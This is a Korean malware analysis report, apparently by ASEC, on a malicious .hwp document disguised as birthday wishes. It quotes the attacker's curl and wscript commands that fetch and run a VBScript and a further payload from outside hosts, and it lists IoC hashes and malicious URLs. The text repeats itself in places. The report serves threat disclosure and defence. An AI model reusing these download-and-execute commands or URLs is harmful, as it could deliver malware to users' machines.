생일 축하 내용으로 위장한 악성 한글 문서 (OLE 개체)
Contents
ASEC 분석팀은 최근 악성 한글 파일을 다운로드 하는 VBScript를 확인하였다. 해당 악성코드의 정확한 유포경로는 확인되지 않았지만 VBScript는 curl을 통해 다운로드 된다.
현재 확인된 명령어는 다음과 같다.
- curl -H \”user-agent: chrome/103.0.5060.134 safari/537.32\” hxxp://datkka.atwebpages[.]com/2vbs -o %appdata%\\vbtemp
- cmd /c cd > %appdata%\\tmp~pth && curl hxxps://datarium.epizy[.]com/2vbs -o %appdata%\\vbtemp
두 명령어 모두 %APPDATA% 폴더에 vbtemp 명으로 스크립트를 저장한다. hxxp://datkka.atwebpages[.]com/2vbs 에는 아래 그림과 같이 작업 스케줄러 등록 및 추가 파일 다운로드 등의 기능을 수행하는 VBScript 코드가 존재한다.
다운로드 된 vbtemp 파일은 wscript //e:vbscript //b %APPDATA%\vbtemp 명령을 통해 실행된다. 스크립트가 정상적으로 실행되기 위해서는 %APPDATA% 폴더에 tmp~pth 파일이 존재해야 한다. 현재 tmp~pth 파일은 확인되지 않았지만 APPDATA 폴더의 경로가 저장되어 있을 것으로 추정된다.
vbtemp 파일 실행 시 curl 명령어를 통해 한글 파일(.hwp)을 다운로드 하고 %APPDATA%\tmp~pth 파일에 저장된 경로를 참조하여 해당 경로에 1.hwp 명으로 저장 및 실행한다. 이때 실행되는 명령어는 다음과 같다.
|cmd /c curl -H “User-Agent: Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) hrome/53.0.3027.64 Safari/537.32” hxxps://bigfile.mail.naver[.]com/download?fid=adR0Wz+5+BKjK3YXKoF0KxuXKAElKxujKogZKog/KoUwKAUdFAujKxMrKqbXKoKla3YlFxUmaxUmF4J4pztrpAUqMxM/K6FCK4M9KqpvpovwMm== -o [\tmp~pth에 저장된 경로]\ 1.hwp && [\tmp~pth에 …
현재 확인된 명령어는 다음과 같다.
- curl -H \”user-agent: chrome/103.0.5060.134 safari/537.32\” hxxp://datkka.atwebpages[.]com/2vbs -o %appdata%\\vbtemp
- cmd /c cd > %appdata%\\tmp~pth && curl hxxps://datarium.epizy[.]com/2vbs -o %appdata%\\vbtemp
두 명령어 모두 %APPDATA% 폴더에 vbtemp 명으로 스크립트를 저장한다. hxxp://datkka.atwebpages[.]com/2vbs 에는 아래 그림과 같이 작업 스케줄러 등록 및 추가 파일 다운로드 등의 기능을 수행하는 VBScript 코드가 존재한다.
다운로드 된 vbtemp 파일은 wscript //e:vbscript //b %APPDATA%\vbtemp 명령을 통해 실행된다. 스크립트가 정상적으로 실행되기 위해서는 %APPDATA% 폴더에 tmp~pth 파일이 존재해야 한다. 현재 tmp~pth 파일은 확인되지 않았지만 APPDATA 폴더의 경로가 저장되어 있을 것으로 추정된다.
vbtemp 파일 실행 시 curl 명령어를 통해 한글 파일(.hwp)을 다운로드 하고 %APPDATA%\tmp~pth 파일에 저장된 경로를 참조하여 해당 경로에 1.hwp 명으로 저장 및 실행한다. 이때 실행되는 명령어는 다음과 같다.
|cmd /c curl -H “User-Agent: Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) hrome/53.0.3027.64 Safari/537.32” hxxps://bigfile.mail.naver[.]com/download?fid=adR0Wz+5+BKjK3YXKoF0KxuXKAElKxujKogZKog/KoUwKAUdFAujKxMrKqbXKoKla3YlFxUmaxUmF4J4pztrpAUqMxM/K6FCK4M9KqpvpovwMm== -o [\tmp~pth에 저장된 경로]\ 1.hwp && [\tmp~pth에 …
IoC
6083a1af637d9dd2b2a16538a17e1f45
60d117f5cb7b0f8133967ec535c85c6a
7c38b40ec19609f32de2a70d409c38b0
ca2917006eb29171c9e5f374e789f53a
d86d57c1d8670d510e7b7a1ad7db9fd2
http://datarium.epizy.com/2vbs
http://datkka.atwebpages.com/2vbs
http://datkka.atwebpages.com/down.php
http://datkka.atwebpages.com/mal
https://datarium.epizy.com/2vbs
https://driver.googledocs.cloudns.nz/Yb/yb
60d117f5cb7b0f8133967ec535c85c6a
7c38b40ec19609f32de2a70d409c38b0
ca2917006eb29171c9e5f374e789f53a
d86d57c1d8670d510e7b7a1ad7db9fd2
http://datarium.epizy.com/2vbs
http://datkka.atwebpages.com/2vbs
http://datkka.atwebpages.com/down.php
http://datkka.atwebpages.com/mal
https://datarium.epizy.com/2vbs
https://driver.googledocs.cloudns.nz/Yb/yb